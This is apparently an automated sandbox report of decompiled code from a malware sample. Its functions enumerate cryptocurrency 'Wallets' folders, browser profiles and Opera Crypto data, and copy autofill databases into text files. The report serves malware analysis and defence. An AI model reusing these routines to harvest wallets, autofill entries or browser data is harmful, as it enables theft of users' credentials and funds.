                                        				_t83 =  *0x29dd62cc; // 0x2bab2a50
                                        				_t182 =  *0x29dd62e0 - 0x10; // 0x1f
                                        				if(_t182 < 0) {
                                        					_t83 = 0x29dd62cc;
                                        				}
                                        				_t144 =  *0x29dd62dc; // 0x15
                                        				if(InternetCrackUrlA(_t83, _t144, 0,  &_a4) != 0) {
                                        					wsprintfA( &_a2104, "%d", _a12 & 0x0000ffff);
                                        					_t172 = _t172 + 0xc;
                                        					lstrcatA( &_a1112, _a12);
                                        					lstrcatA( &_a112, _v0);
                                        					lstrcatA( &_a112, "://");
                                        				} else {
                                        					lstrcatA( &_a2104, "80");
                                        					_t118 =  *0x29dd62cc; // 0x2bab2a50
                                        					_t184 =  *0x29dd62e0 - 0x10; // 0x1f
                                        					if(_t184 < 0) {
                                        						_t118 = 0x29dd62cc;
                                        					}
                                        					lstrcatA( &_a1104, _t118);
                                        					lstrcatA( &_a104, "http://");
                                        				}
                                        				_t130 =  *0x29dd82e4; // 0x74c69020
                                        				_push(_t130);
                                        				_t92 = E29DA2920( &_a56);
                                        				_a8132 = 0;
                                        				if( *((intOrPtr*)(_t92 + 0x14)) >= 0x10) {
                                        					_t92 =  *_t92;
                                        				}
                                        				_push(_t92);
                                        				E29D8E880(_t130,  &_a84);
                                        				_push("/");
                                        				_push( &_a2112);
                                        				_a8132 = 1;
                                        				_push(E29DAEC33());
                                        				_push( &_a1112);
                                        				_push( &_a112);
                                        				_t174 = _t172 + 4 - 0x1c;
                                        				_t132 = _t174;
                                        				_v16 = _t174;
                                        				 *(_t132 + 0x14) = 0xf;
                                        				 *((intOrPtr*)(_t132 + 0x10)) = 0;
                                        				 *_t132 = 0;
                                        				E29D894C0(_t132, 0x29dd6304, 0, 0xffffffff);
                                        				_t97 = E29D98000(_t121, _v20);
                                        				_t175 = _t174 + 0x34;
                                        				lstrcatA( &_a3100, _t97);
                                        				if(_a92 >= 0x10) {
                                        					_push(_a84);
                                        					E29DADF3B();
                                        					_t175 = _t175 + 4;
                                        				}
                                        				_a8132 = 0xffffffff;
                                        				_a104 = 0xf;
                                        				_a100 = 0;
                                        				_a84 = 0;
                                        				if(_a76 >= 0x10) {
                                        					_push(_a56);
                                        					E29DADF3B();
                                        					_t175 = _t175 + 4;
                                        				}
                                        				_a76 = 0xf;
                                        				_a72 = 0;
                                        				_a56 = 0;
                                        				E29DB5640( &_v4, 0, 0x3c);
                                        				E29DB5640( &_a2112, 0, 0x3e8);
                                        				E29DB5640( &_a1112, 0, 0x3e8);
                                        				_t151 =  &_a112;
                                        				E29DB5640( &_a112, 0, 0x3e8);
                                        				_t179 = _t175 + 0x30;
                                        				_t105 = lstrlenA( &_a3112);
                                        				_t106 =  &_a3112;
                                        				if(_t105 <= 4) {
                                        					_t107 = lstrlenA( &_a3112);
                                        					 *0x29dd86f0 = 1;
                                        					__eflags = _t107 - 2;
                                        					if(_t107 != 2) {
                                        						 *0x29dd86f0 = 0;
                                        					}
                                        					goto L19;
                                        				} else {
                                        					_t180 = _t179 - 0x1c;
                                        					_t139 = _t180;
                                        					 *(_t139 + 0x14) = 0xf;
                                        					 *((intOrPtr*)(_t139 + 0x10)) = 0;
                                        					_v16 = _t180;
                                        					 *_t139 = 0;
                                        					_t163 = _t106 + 1;
                                        					do {
                                        						_t152 =  *_t106;
                                        						_t106 = _t106 + 1;
                                        					} while (_t152 != 0);
                                        					_t151 =  &_a3112;
                                        					E29D892C0(_t139,  &_a3112, _t106 - _t163);
                                        					E29D8EA30();
                                        					_t179 = _t180 + 0x1c;
                                        					 *0x29dd86f0 = 1;
                                        					L19:
                                        					 *[fs:0x0] = _a8124;
                                        					_pop(_t157);
                                        					_pop(_t162);
                                        					_pop(_t123);
                                        					return E29DADF46(0, _t123, _a8116 ^ _t179, _t151, _t157, _t162);
                                        				}
                                        			}












































                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memset$lstrcat$lstrlen$CrackInternetwsprintf
                                        • String ID: ://$<$http://
                                        • API String ID: 4191193034-1638580327
                                        • Opcode ID: 3ccb9ef0e04a8f07bc8028292f9a474bac8b9bf7658de90224ec5db684e721a5
                                        • Instruction ID: f14da281c85a32d8ab8f2e976b6e9174797e80ca90e8c172083b63ae55000753
                                        • Opcode Fuzzy Hash: 3ccb9ef0e04a8f07bc8028292f9a474bac8b9bf7658de90224ec5db684e721a5
                                        • Instruction Fuzzy Hash: F291C8B2914380ABD321EF64DC85F9B7BE8BB94B10F408A1DF14997281DB74D109DBB2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 76%
                                        			E29D96259(intOrPtr* __ebx, CHAR* __edi, void* __esi) {
                                        				int _t44;
                                        				signed char _t51;
                                        				intOrPtr* _t77;
                                        				CHAR* _t105;
                                        				void* _t106;
                                        				signed int _t107;
                                        				void* _t109;
                                        
                                        				_t106 = __esi;
                                        				_t105 = __edi;
                                        				_t77 = __ebx;
                                        				do {
                                        					_push(".");
                                        					_push(_t107 - 0x928);
                                        					if( *0x29dd8550() != 0) {
                                        						_push("..");
                                        						_push(_t107 - 0x928);
                                        						if( *0x29dd8550() != 0) {
                                        							if(_t106 == 0) {
                                        								wsprintfA(_t107 - 0x324, "%s\\%s\\%s", _t107 - 0x21c,  *((intOrPtr*)(_t107 - 0x958)), _t107 - 0x928);
                                        								_t109 = _t109 + 0x14;
                                        							} else {
                                        								wsprintfA(_t107 - 0x324, "%s\\%s\\%s\\%s", _t107 - 0x21c,  *((intOrPtr*)(_t107 - 0x958)), _t107 - 0x928,  *(_t107 - 0x95c));
                                        								_t109 = _t109 + 0x18;
                                        							}
                                        							_t51 = GetFileAttributesA(_t107 - 0x324);
                                        							if(_t51 != 0xffffffff && (_t51 & 0x00000010) == 0) {
                                        								E29DB5640(_t107 - 0x114, 0, 0x104);
                                        								_t109 = _t109 + 0xc;
                                        								lstrcatA(_t107 - 0x114, "\\");
                                        								lstrcatA(_t107 - 0x114, "W");
                                        								lstrcatA(_t107 - 0x114, "a");
                                        								lstrcatA(_t107 - 0x114, "l");
                                        								lstrcatA(_t107 - 0x114, "l");
                                        								lstrcatA(_t107 - 0x114, "e");
                                        								lstrcatA(_t107 - 0x114, "t");
                                        								lstrcatA(_t107 - 0x114, "s");
                                        								lstrcatA(_t107 - 0x114, "\\");
                                        								lstrcatA(_t107 - 0x114, _t105);
                                        								lstrcatA(_t107 - 0x114, "\\");
                                        								if(_t106 == 0) {
                                        									lstrcatA(_t107 - 0x114, _t107 - 0x928);
                                        								} else {
                                        									lstrcatA(_t107 - 0x114, _t107 - 0x928);
                                        									lstrcatA(_t107 - 0x114, "\\");
                                        									lstrcatA(_t107 - 0x114,  *(_t107 - 0x95c));
                                        								}
                                        								if(_t77 != 0) {
                                        									if( *_t77 == 2) {
                                        										 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t77 + 4)), _t107 - 0x324, _t107 - 0x114, 0, 2);
                                        									} else {
                                        										 *0x29dd8814 = 0x80000;
                                        									}
                                        								} else {
                                        									 *0x29dd8814 = 0x10000;
                                        								}
                                        							}
                                        						}
                                        					}
                                        					_t93 =  *(_t107 - 0x960);
                                        				} while (FindNextFileA( *(_t107 - 0x960), _t107 - 0x954) != 0);
                                        				_t44 = FindClose( *(_t107 - 0x960));
                                        				return E29DADF46(_t44, _t77,  *(_t107 - 8) ^ _t107, _t93, _t105, _t106);
                                        			}











                                        APIs
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9626C
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D96286
                                        • wsprintfA.USER32 ref: 29D962C0
                                        • wsprintfA.USER32 ref: 29D962EC
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D962FC
                                        • _memset.LIBCMT ref: 29D96321
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D96335
                                        • lstrcatA.KERNEL32(?,29DCFD20), ref: 29D96347
                                        • lstrcatA.KERNEL32(?,29DCFD24), ref: 29D96359
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D9636B
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D9637D
                                        • lstrcatA.KERNEL32(?,29DCFD2C), ref: 29D9638F
                                        • lstrcatA.KERNEL32(?,29DCFD30), ref: 29D963A1
                                        • lstrcatA.KERNEL32(?,29DCFD34), ref: 29D963B3
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D963C5
                                        • lstrcatA.KERNEL32(?), ref: 29D963D3
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D963E5
                                        • lstrcatA.KERNEL32(?,?), ref: 29D963FD
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9640F
                                        • lstrcatA.KERNEL32(?,?), ref: 29D96433
                                        • FindNextFileA.KERNEL32(?,?), ref: 29D96486
                                        • FindClose.KERNEL32(?), ref: 29D9649B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileFindwsprintf$AttributesCloseNext_memset
                                        • String ID: %s\%s\%s\%s
                                        • API String ID: 3233782966-922548283
                                        • Opcode ID: 5249102a4a0ef81884ce34643ce3c8200d594f6b31388f08978e04a1ecf64c75
                                        • Instruction ID: d53421abdede9109233767e049c7484b7b9f7bd2f203ce395f7a28d1ba3d6131
                                        • Opcode Fuzzy Hash: 5249102a4a0ef81884ce34643ce3c8200d594f6b31388f08978e04a1ecf64c75
                                        • Instruction Fuzzy Hash: 0B4142B6841158ABD715EBE0DC89FDAB738BF58B01F80869CF20593444EB349A49AF71
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E29D9FB10(void* __ebx, void* __edi, CHAR* __esi, intOrPtr _a4) {
                                        				signed int _v12;
                                        				char _v280;
                                        				char _v544;
                                        				void* _v1544;
                                        				intOrPtr _v1548;
                                        				signed int _t32;
                                        				int _t60;
                                        				struct HINSTANCE__* _t76;
                                        				signed int _t90;
                                        
                                        				_t89 = __esi;
                                        				_t88 = __edi;
                                        				_t66 = __ebx;
                                        				_t32 =  *0x29dd5664; // 0xd9555f04
                                        				_v12 = _t32 ^ _t90;
                                        				_v1548 = _a4;
                                        				E29DB5640( &_v544, 0, 0x104);
                                        				E29DB5640( &_v280, 0, 0x104);
                                        				E29DB5640( &_v1544, 0, 0x3e8);
                                        				lstrcatA( &_v544,  &_v1544 & (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v1544) < 0x00000000) - 0x00000001);
                                        				lstrcatA( &_v544, __esi);
                                        				lstrcatA( &_v280,  &_v544);
                                        				lstrcatA( &_v280, "..\\");
                                        				lstrcatA( &_v280, "p");
                                        				lstrcatA( &_v280, "r");
                                        				lstrcatA( &_v280, "o");
                                        				lstrcatA( &_v280, "f");
                                        				lstrcatA( &_v280, "i");
                                        				lstrcatA( &_v280, "l");
                                        				lstrcatA( &_v280, "e");
                                        				lstrcatA( &_v280, "s");
                                        				_t87 =  &_v280;
                                        				lstrcatA( &_v280, ".ini");
                                        				_t60 = GetFileAttributesA( &_v280);
                                        				if(_t60 != 0xffffffff && (_t60 & 0x00000010) == 0) {
                                        					E29D936D0();
                                        					if(E29D9F960(__ebx, __edi) != 0) {
                                        						_t87 =  *((intOrPtr*)(__edi + 0x20));
                                        						E29D9B960(__edi, 0x29dcd617,  &_v544, __ebx,  *((intOrPtr*)(__edi + 0x20)), _v1548);
                                        					}
                                        					_t76 =  *0x29dd833c; // 0x0
                                        					_t60 = FreeLibrary(_t76);
                                        				}
                                        				return E29DADF46(_t60, _t66, _v12 ^ _t90, _t87, _t88, _t89);
                                        			}













                                        APIs
                                        • _memset.LIBCMT ref: 29D9FB3A
                                        • _memset.LIBCMT ref: 29D9FB50
                                        • _memset.LIBCMT ref: 29D9FB66
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D9FB7D
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9FB9B
                                        • lstrcatA.KERNEL32(?,01596F20), ref: 29D9FBA9
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9FBBD
                                        • lstrcatA.KERNEL32(?,..\), ref: 29D9FBCF
                                        • lstrcatA.KERNEL32(?,29DD04D8), ref: 29D9FBE1
                                        • lstrcatA.KERNEL32(?,29DD04DC), ref: 29D9FBF3
                                        • lstrcatA.KERNEL32(?,29DD04E0), ref: 29D9FC05
                                        • lstrcatA.KERNEL32(?,29DD04E4), ref: 29D9FC17
                                        • lstrcatA.KERNEL32(?,29DD04E8), ref: 29D9FC29
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D9FC3B
                                        • lstrcatA.KERNEL32(?,29DCFD2C), ref: 29D9FC4D
                                        • lstrcatA.KERNEL32(?,29DCFD34), ref: 29D9FC5F
                                        • lstrcatA.KERNEL32(?,.ini), ref: 29D9FC71
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9FC7E
                                          • Part of subcall function 29D936D0: GetProcessHeap.KERNEL32(00000000,?), ref: 29D937B4
                                          • Part of subcall function 29D936D0: HeapAlloc.KERNEL32(00000000), ref: 29D937BB
                                          • Part of subcall function 29D936D0: GetProcessHeap.KERNEL32(00000000,?), ref: 29D9385A
                                          • Part of subcall function 29D936D0: HeapAlloc.KERNEL32(00000000), ref: 29D93861
                                          • Part of subcall function 29D9F960: GetEnvironmentVariableA.KERNEL32(PATH,29DD9030,0000FFFF,01596F20,?,29D9FC97), ref: 29D9F995
                                          • Part of subcall function 29D9F960: _memset.LIBCMT ref: 29D9F9A9
                                          • Part of subcall function 29D9F960: lstrcatA.KERNEL32(?,29DD9030,?,?,29D9FC97), ref: 29D9F9BD
                                          • Part of subcall function 29D9F960: lstrcatA.KERNEL32(?,29DCFA80,?,?,29D9FC97), ref: 29D9F9CF
                                          • Part of subcall function 29D9F960: lstrcatA.KERNEL32(?,015A1F98,?,?,29D9FC97), ref: 29D9F9DD
                                          • Part of subcall function 29D9F960: SetEnvironmentVariableA.KERNEL32(PATH,?,?,?,29D9FC97), ref: 29D9F9EF
                                          • Part of subcall function 29D9F960: _memset.LIBCMT ref: 29D9FA03
                                          • Part of subcall function 29D9F960: LoadLibraryA.KERNEL32(0159C9F0,?,?,?,?,?,29D9FC97), ref: 29D9FA11
                                          • Part of subcall function 29D9F960: GetProcAddress.KERNEL32(00000000,015A2670), ref: 29D9FA2C
                                          • Part of subcall function 29D9F960: GetProcAddress.KERNEL32(00000000,015A24F0), ref: 29D9FA44
                                          • Part of subcall function 29D9F960: GetProcAddress.KERNEL32(00000000,0159C6D0), ref: 29D9FA5D
                                          • Part of subcall function 29D9F960: GetProcAddress.KERNEL32(00000000,015A26B8), ref: 29D9FA75
                                          • Part of subcall function 29D9F960: GetProcAddress.KERNEL32(00000000,0159C770), ref: 29D9FA8D
                                          • Part of subcall function 29D9F960: GetProcAddress.KERNEL32(00000000,015A2400), ref: 29D9FAA6
                                        • FreeLibrary.KERNEL32(00000000), ref: 29D9FCC1
                                          • Part of subcall function 29D9B960: wsprintfA.USER32 ref: 29D9B9B2
                                          • Part of subcall function 29D9B960: FindFirstFileA.KERNEL32(?,?), ref: 29D9B9C9
                                          • Part of subcall function 29D9B960: StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9B9EC
                                          • Part of subcall function 29D9B960: StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D9BA06
                                          • Part of subcall function 29D9B960: wsprintfA.USER32 ref: 29D9BA2E
                                          • Part of subcall function 29D9B960: StrCmpCA.SHLWAPI(?,015A4C58), ref: 29D9BA45
                                          • Part of subcall function 29D9B960: FindNextFileA.KERNEL32(?,?), ref: 29D9BB7C
                                          • Part of subcall function 29D9B960: FindClose.KERNEL32(?), ref: 29D9BB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$AddressProc$_memset$Heap$FileFind$AllocEnvironmentLibraryProcessVariablewsprintf$AttributesCloseFirstFolderFreeLoadNextPath
                                        • String ID: ..\$.ini
                                        • API String ID: 2842863029-2443844595
                                        • Opcode ID: 1dc79f19cab0877b01861707182f978eab39796a06442861f6606a6a1025fe1e
                                        • Instruction ID: 4210c822ebb0fa333a936c53b079b54a8684979f548ee9736d586b32f35e6b0d
                                        • Opcode Fuzzy Hash: 1dc79f19cab0877b01861707182f978eab39796a06442861f6606a6a1025fe1e
                                        • Instruction Fuzzy Hash: 084145B394115C6BD715EBA0DC89FEDB339AB58B00F40859CF70596040EA789A45AF71
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 44%
                                        			E29D9F5A0(CHAR* __ecx, CHAR* __edx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v24;
                                        				char _v288;
                                        				char _v552;
                                        				char _v816;
                                        				void* _v1816;
                                        				intOrPtr _v1824;
                                        				char _v1828;
                                        				char _v1844;
                                        				intOrPtr _v1852;
                                        				char _v1856;
                                        				short _v1872;
                                        				char _v1876;
                                        				char _v1880;
                                        				short _v1884;
                                        				CHAR* _v1888;
                                        				intOrPtr _v1892;
                                        				CHAR* _v1896;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t87;
                                        				signed int _t88;
                                        				intOrPtr _t103;
                                        				CHAR* _t119;
                                        				intOrPtr* _t121;
                                        				WCHAR* _t126;
                                        				signed char _t127;
                                        				intOrPtr _t131;
                                        				intOrPtr _t132;
                                        				intOrPtr _t138;
                                        				intOrPtr _t139;
                                        				void* _t145;
                                        				char _t146;
                                        				void* _t147;
                                        				intOrPtr _t154;
                                        				intOrPtr _t160;
                                        				void* _t180;
                                        				void* _t186;
                                        				CHAR* _t187;
                                        				intOrPtr _t189;
                                        				void* _t190;
                                        				void* _t191;
                                        				CHAR* _t192;
                                        				intOrPtr _t193;
                                        				void* _t195;
                                        				signed int _t196;
                                        				void* _t197;
                                        				void* _t201;
                                        				void* _t203;
                                        
                                        				_t87 =  *0x29dd5664; // 0xd9555f04
                                        				_t88 = _t87 ^ _t196;
                                        				_v24 = _t88;
                                        				 *[fs:0x0] =  &_v16;
                                        				_t192 = _a8;
                                        				_t187 =  *0x29dd8068; // 0x15a2ef8
                                        				_t146 = 0;
                                        				_v1892 = _a4;
                                        				_v1888 = __ecx;
                                        				_v1896 = __edx;
                                        				_v1876 = 0;
                                        				_v1880 = 0;
                                        				E29DB5640( &_v552, 0, 0x104);
                                        				E29DB5640( &_v816, 0, 0x104);
                                        				E29DB5640( &_v1816, 0, 0x3e8);
                                        				_t201 = _t197 - 0x758 + 0x24;
                                        				_t17 = (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v1816, _t88, _t186, _t191, _t145,  *[fs:0x0], E29DC41AB, 0xffffffff) < 0x00000000) - 1; // -1
                                        				lstrcatA( &_v552, _t17 &  &_v1816);
                                        				lstrcatA( &_v552, _t187);
                                        				lstrcatA( &_v552, _t192);
                                        				_t103 =  *0x29dd80a0; // 0x15a4b08
                                        				_push(_t103);
                                        				_push(_t192);
                                        				_v1884 = 0;
                                        				if( *0x29dd8550() == 0) {
                                        					_v1884 = 1;
                                        				}
                                        				_t154 =  *0x29dd7b00; // 0x15a2cf8
                                        				_push(_t154);
                                        				_push(_t192);
                                        				if( *0x29dd8550() == 0) {
                                        					_v1884 = 2;
                                        				}
                                        				_push("Opera Crypto Stable");
                                        				_push(_t192);
                                        				if( *0x29dd8550() == 0) {
                                        					_v1884 = 3;
                                        				}
                                        				E29DB5640( &_v1816, _t146, 0x3e8);
                                        				_t30 = (0 |  *0x29dd8500(_t146, 0x1a, _t146, _t146,  &_v1816) < 0x00000000) - 1; // -1
                                        				lstrcatA( &_v816, _t30 &  &_v1816);
                                        				lstrcatA( &_v816, _t187);
                                        				E29DB5640( &_v288, _t146, 0x104);
                                        				_t203 = _t201 + 0x18;
                                        				lstrcatA( &_v288,  &_v552);
                                        				lstrcatA( &_v288, "\\");
                                        				_t119 =  *0x29dd7d54; // 0x15a1fe0
                                        				lstrcatA( &_v288, _t119);
                                        				_t121 =  &_v288;
                                        				_v1824 = 0xf;
                                        				_v1828 = _t146;
                                        				_v1844 = _t146;
                                        				_t180 = _t121 + 1;
                                        				do {
                                        					_t160 =  *_t121;
                                        					_t121 = _t121 + 1;
                                        				} while (_t160 != _t146);
                                        				E29D892C0( &_v1844,  &_v288, _t121 - _t180);
                                        				_v8 = _t146;
                                        				_t126 = E29DA4990( &_v1844,  &_v1844,  &_v1872);
                                        				if(_t126[0xa] >= 8) {
                                        					_t126 =  *_t126;
                                        				}
                                        				_t127 = GetFileAttributesW(_t126);
                                        				if(_t127 == 0xffffffff || (_t127 & 0x00000010) != 0) {
                                        					_t193 = 0;
                                        				} else {
                                        					_t193 = 1;
                                        				}
                                        				if(_v1852 >= 8) {
                                        					_push(_v1872);
                                        					E29DADF3B();
                                        					_t203 = _t203 + 4;
                                        				}
                                        				_v8 = 0xffffffff;
                                        				_v1852 = 7;
                                        				_v1856 = _t146;
                                        				_v1872 = 0;
                                        				if(_v1824 >= 0x10) {
                                        					_push(_v1844);
                                        					E29DADF3B();
                                        					_t203 = _t203 + 4;
                                        				}
                                        				_v1824 = 0xf;
                                        				_v1828 = _t146;
                                        				_v1844 = _t146;
                                        				if(_t193 != _t146 && E29D99300( &_v1876,  &_v1880,  &_v288) == 0) {
                                        					_t138 = _v1876;
                                        					if(_t138 != _t146) {
                                        						 *0x29dd8464(_t138, _t146);
                                        						_v1876 = _t146;
                                        					}
                                        					_t139 = _v1880;
                                        					if(_t139 != _t146) {
                                        						 *0x29dd8518(_t139);
                                        					}
                                        					_v1876 = _t146;
                                        					_v1880 = _t146;
                                        				}
                                        				_t189 = _v1892;
                                        				_t194 = _v1888;
                                        				_t184 = _v1880;
                                        				E29D9B520(_t189, 0x29dcd617,  &_v552, _v1888, _v1876, _v1880,  *((intOrPtr*)(_t189 + 0x20)), _v1896, _a12);
                                        				if( *((intOrPtr*)(_t189 + 6)) != _t146) {
                                        					_t184 = _v1884;
                                        					E29D9E9B0( &_v816, _t194, _t189, _v1884);
                                        					_t146 = 0;
                                        				}
                                        				_t131 = _v1876;
                                        				if(_t131 != _t146) {
                                        					 *0x29dd8464(_t131, _t146);
                                        					_v1876 = _t146;
                                        				}
                                        				_t132 = _v1880;
                                        				if(_t132 != _t146) {
                                        					_t132 =  *0x29dd8518(_t132);
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t190);
                                        				_pop(_t195);
                                        				_pop(_t147);
                                        				return E29DADF46(_t132, _t147, _v24 ^ _t196, _t184, _t190, _t195);
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D9F607
                                        • _memset.LIBCMT ref: 29D9F61C
                                        • _memset.LIBCMT ref: 29D9F631
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F645
                                        • lstrcatA.KERNEL32(?,-00000001,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F665
                                        • lstrcatA.KERNEL32(?,015A2EF8,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F673
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F681
                                        • StrCmpCA.SHLWAPI(00000000,015A4B08,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F694
                                        • StrCmpCA.SHLWAPI(00000000,015A2CF8,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F6B0
                                        • StrCmpCA.SHLWAPI(00000000,Opera Crypto Stable,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F6CA
                                        • _memset.LIBCMT ref: 29D9F6EB
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01599110), ref: 29D9F6FF
                                        • lstrcatA.KERNEL32(?,-00000001,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F71F
                                        • lstrcatA.KERNEL32(?,015A2EF8,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F72D
                                        • _memset.LIBCMT ref: 29D9F740
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01599110), ref: 29D9F756
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,?,?,?,01599110), ref: 29D9F768
                                        • lstrcatA.KERNEL32(?,015A1FE0,?,?,?,?,?,?,?,?,?,?,?,?,?,01599110), ref: 29D9F77B
                                        • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 29D9F7DE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$FolderPath$AttributesFile
                                        • String ID: Opera Crypto Stable
                                        • API String ID: 375595732-2665741402
                                        • Opcode ID: 343e72ff9d87fba3cfc21dd24899ab62f9086de5d64d1768a4e9775c48e9e7bd
                                        • Instruction ID: 1d39b09ce1d5c769577430679a1826c3012246377c03039a7362b4e476fa5960
                                        • Opcode Fuzzy Hash: 343e72ff9d87fba3cfc21dd24899ab62f9086de5d64d1768a4e9775c48e9e7bd
                                        • Instruction Fuzzy Hash: 35A15FB2D04258AFDB15EF64DC84BDAB7B8EB58700F0081E9E50DA7140D778AE85DFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 57%
                                        			E29D9B2C0(intOrPtr __ecx, intOrPtr* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v540;
                                        				char _v544;
                                        				char _v548;
                                        				intOrPtr _v552;
                                        				intOrPtr _v556;
                                        				intOrPtr* _v560;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t35;
                                        				signed int _t44;
                                        				void* _t54;
                                        				long _t57;
                                        				void* _t64;
                                        				int _t65;
                                        				CHAR* _t67;
                                        				CHAR* _t68;
                                        				void* _t74;
                                        				CHAR* _t77;
                                        				intOrPtr* _t85;
                                        				void* _t99;
                                        				void* _t101;
                                        				CHAR* _t102;
                                        				CHAR* _t103;
                                        				signed int _t104;
                                        				void* _t105;
                                        				void* _t108;
                                        				void* _t110;
                                        				void* _t111;
                                        				void* _t115;
                                        
                                        				_t115 = __eflags;
                                        				_t35 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t35 ^ _t104;
                                        				_t75 = _a4;
                                        				_v556 = _a8;
                                        				_v552 = __ecx;
                                        				_v560 = __edx;
                                        				E29DB5640( &_v276, 0, 0x104);
                                        				_t77 =  *0x29dd8098; // 0x15a1f98
                                        				lstrcatA( &_v276, _t77);
                                        				_t102 = E29DADFE0( &_v276, _t99, _t101, 0x1a);
                                        				 *_t102 = 0;
                                        				E29DAFCE4(GetTickCount());
                                        				_t108 = _t105 + 0x14;
                                        				_t100 = 0x1a;
                                        				do {
                                        					_t44 = E29DAFCF6(_t115);
                                        					asm("cdq");
                                        					_push(_t44 % 0xa);
                                        					_push(_t102);
                                        					wsprintfA(_t102, "%s%d");
                                        					_t108 = _t108 + 0x10;
                                        					_t100 = _t100 - 1;
                                        				} while (_t100 != 0);
                                        				_t102[0x1a] = 0;
                                        				lstrcatA( &_v276, _t102);
                                        				CopyFileA(_t75,  &_v276, 1);
                                        				E29DB5640( &_v540, _t100, 0x104);
                                        				wsprintfA( &_v540, "\\Autofill\\%s_%s.txt", _v552, _v556);
                                        				_t103 =  *0x29dd7aa8; // 0x1598ea8
                                        				_t54 =  *0x29dd8344( &_v276,  &_v548);
                                        				_t110 = _t108 + 0x24;
                                        				if(_t54 != 0) {
                                        					L12:
                                        					return E29DADF46(DeleteFileA( &_v276), _t75, _v8 ^ _t104,  &_v276, _t100, _t103);
                                        				}
                                        				_t57 =  *0x29dd82f8(_v548, _t103, 0xffffffff,  &_v544, _t54);
                                        				_t111 = _t110 + 0x14;
                                        				if(_t57 != 0) {
                                        					L11:
                                        					 *0x29dd8318(_v544);
                                        					 *0x29dd8348(_v548);
                                        					goto L12;
                                        				}
                                        				_t103 = HeapAlloc(GetProcessHeap(), _t57, 0xf423f);
                                        				_t64 =  *0x29dd8314(_v544);
                                        				_t111 = _t111 + 4;
                                        				if(_t64 != 0x64) {
                                        					L6:
                                        					_t65 = lstrlenA(_t103);
                                        					_t85 = _v560;
                                        					if(_t85 != 0) {
                                        						__eflags =  *_t85 - 2;
                                        						if( *_t85 == 2) {
                                        							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t85 + 4)), _t103,  &_v540, _t65, 3);
                                        						} else {
                                        							 *0x29dd8814 = 0x80000;
